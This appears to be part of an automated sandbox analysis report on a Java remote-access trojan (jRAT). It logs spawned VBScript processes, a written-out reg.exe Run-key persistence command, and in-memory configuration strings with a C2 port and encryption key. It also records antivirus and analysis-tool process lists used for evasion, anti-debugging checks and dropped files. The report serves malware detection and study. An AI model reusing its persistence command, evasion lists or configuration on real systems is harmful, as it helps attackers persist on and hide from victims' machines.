Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6418174406144645399.vbs
Source: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs
Source: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6799039488535261462.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6418174406144645399.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3450254285310729085.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Creates files inside the system directory

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe

File created: C:\Windows\System32\test.txt

Reads the hosts file

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe	File read: C:\Windows\System32\drivers\etc\hosts

Uses reg.exe to modify the Windows registry

Show sources

Source: unknown

Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GboKDMbfKti /t REG_EXPAND_SZ /d '\'C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe\' -jar \'C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy\'' /f

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: javaw.exe	Binary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe	Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}R7Df:5
Source: javaw.exe	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}R7Df:5
Source: javaw.exe	Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}^
Source: javaw.exe	Binary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
Source: javaw.exe	Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}]h
Source: javaw.exe	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}^
Source: javaw.exe	Binary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}can.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":1,"SERVER_PATH":"C:\\Users\\user\\eDdlsoVKfgW\\AknzQIkoyKh.qmSBQy","VBOX":false,"RAM":"511.6 MB"},"psview.exe","quamgr.ex
Source: javaw.exe	Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShieldCCC.exe","MCShieldRTM.exe","MCShieldDS.exe","MCS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":1,"SERVER_PATH":"C:\\Users\\user\\eDdlsoVKfgW\\AknzQIkoyKh.qmSBQy","VBOX":false,"RAM":"511.6 MB"}E":"VIPRE Security 20
Source: java.exe, javaw.exe	Binary or memory string: Progman
Source: javaw.exe	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}]h
Source: javaw.exe	Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShieldCCC.exe","MCShieldRTM.exe","MCShieldDS.exe","MCS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":1,"SERVER_PATH":"C:\\Users\\user\\eDdlsoVKfgW\\AknzQIkoyKh.qmSBQy","VBOX":false,"RAM":"511.6 MB"}E":"VIPRE Security 20
Source: javaw.exe	Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: java.exe, javaw.exe	Binary or memory string: Program Manager
Source: java.exe, javaw.exe	Binary or memory string: Shell_TrayWnd

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe

Memory protected: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe

System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: java.exe	Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: java.exe	Binary or memory string: VMWARE[@p
Source: javaw.exe	Binary or memory string: _well_known_klasses[SystemDictionary::VirtualMachineError_klass_knum]
Source: javaw.exe	Binary or memory string: VMWARE
Source: javaw.exe	Binary or memory string: Unable to link/verify VirtualMachineError class
Source: javaw.exe	Binary or memory string: java/lang/VirtualMachineError
Source: java.exe	Binary or memory string: VMWARE#H~
Source: java.exe, javaw.exe	Binary or memory string: cjava/lang/VirtualMachineError
Source: javaw.exe	Binary or memory string: k{constant pool}code cache C-heap hand metaspace chunks dict zone strs syms heap threads [Verifying Genesis-2147483648Unable to link/verify Finalizer.register methodUnable to link/verify ClassLoader.addClass methodProtectionDomain.impliesCreateAccessControlContext() has the wrong linkageUnable to link/verify Unsafe.throwIllegalAccessError methodJava heap space: failed reallocation of scalar replaced objectsGC overhead limit exceededRequested array size exceeds VM limitCompressed class spaceJava heap spaceUnable to link/verify VirtualMachineError classD:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\hotspot\src\share\vm\oops\arrayKlass.cpp[]guarantee(component_mirror()->klass() != NULL) failedshould have a classD:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\hotspot\src\share\vm\gc_interface/collectedHeap.inline.hpp - length: %dguarantee(a->length() >= 0) failedarray with negative length?guarantee(obj->is_array()) failedmust be arrayshould be klassguarantee(is_constantPool())
Source: java.exe	Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: java.exe, javaw.exe	Binary or memory string: $[Ljava/lang/VirtualMachineError;
Source: java.exe	Binary or memory string: VMWARE;

Enumerates the file system

Show sources

Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\AppData\Roaming\Oracle\lib\
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\AppData\Roaming\Oracle\lib\ext\
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\AppData\Roaming\Oracle\
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\AppData\

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_es2.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe TID: 3832	Thread sleep time: -100s >= -60s
Source: C:\Windows\System32\cscript.exe TID: 3508	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\cscript.exe TID: 3568	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\cscript.exe TID: 3640	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\cscript.exe TID: 3700	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\cscript.exe TID: 4068	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\cscript.exe TID: 2232	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\cscript.exe TID: 2200	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\cscript.exe TID: 772	Thread sleep time: -60000s >= -60s

Tries to detect sandboxes and other dynamic analysis tools (process name)

Show sources

Source: java.exe, javaw.exe	Binary or memory string: WIRESHARK.EXE
Source: java.exe, javaw.exe	Binary or memory string: PROCEXP.EXE
Source: java.exe, javaw.exe	Binary or memory string: SUPERANTISPYWARE.EXE
Source: java.exe, javaw.exe	Binary or memory string: DUMPCAP.EXE

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process information set: NOOPENFILEERRORBOX
